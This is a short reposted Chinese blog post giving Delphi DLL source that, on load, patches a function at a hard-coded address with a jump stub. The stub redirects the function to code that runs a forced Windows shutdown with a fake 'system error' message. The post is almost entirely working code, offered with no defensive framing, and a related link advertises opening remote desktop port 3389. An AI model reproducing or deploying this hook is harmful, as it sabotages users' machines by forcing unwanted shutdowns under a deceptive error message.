delphi 替换其他程序里面的函数为自己的函数

本文整理自网络，侵删。

  原理就不用说了吧,会玩HOOK的老兄都知道啦.............

Procedure MyFunctionAddress();
begin
winexec('cmd /c shutdown -s -t 10 -f -c 系统出错.',0 );

end;


Procedure Modify();
var
dat:DWORD;
zrn: Cardinal;
FunctionPointer:Pointer;
tpv:array [0..3] of Byte;
NewAddress:array [0..7] of Byte;
OldAddress:array [0..7] of Byte;
begin
FunctionPointer:=Pointer($45411CB8); //要被替换的程序里那个要替换的函数的地址.
dat:=DWORD(@MyFunctionAddress);
Move(dat, tpv, 4);
NewAddress[0] := $B8;
NewAddress[1] := tpv[0];
NewAddress[2] := tpv[1];
NewAddress[3] := tpv[2];
NewAddress[4] := tpv[3];
NewAddress[5] := $FF;
NewAddress[6] := $E0;
NewAddress[7] := 0;
if ReadProcessMemory( GetCurrentProcess,FunctionPointer, @OldAddress, 8, zrn) then
begin
WriteProcessMemory(GetCurrentProcess,FunctionPointer, @NewAddress, 8, zrn);
end;
end;

procedure DllMain(Reason: Integer);
begin
case Reason of
DLL_PROCESS_ATTACH:
begin
Modify();
end;
DLL_PROCESS_DETACH:
begin

end;
end;
end;

begin
DLLProc:=@DllMain;
DllMain(DLL_PROCESS_ATTACH);
end.
 

相关阅读 >>

xp/2003下Delphi最简单的方法开放3389

Delphi sqlite防止插入重复数据的方法

Delphi opendialog文件过滤类型

Delphi调节图片亮度、色彩和饱和度的代码

Delphi 取得文件夹及下一级文件夹下的文件列表

Delphi 如何快速读取文本文件

Delphi 获取当前光标处颜色的例子

Delphi 创建并调用 dll

Delphi 使richedit中的链接可以点击

Delphi常用日期函数

更多相关阅读请进入《Delphi》频道 >>

转载请注明出处：木庄网络博客 » delphi 替换其他程序里面的函数为自己的函数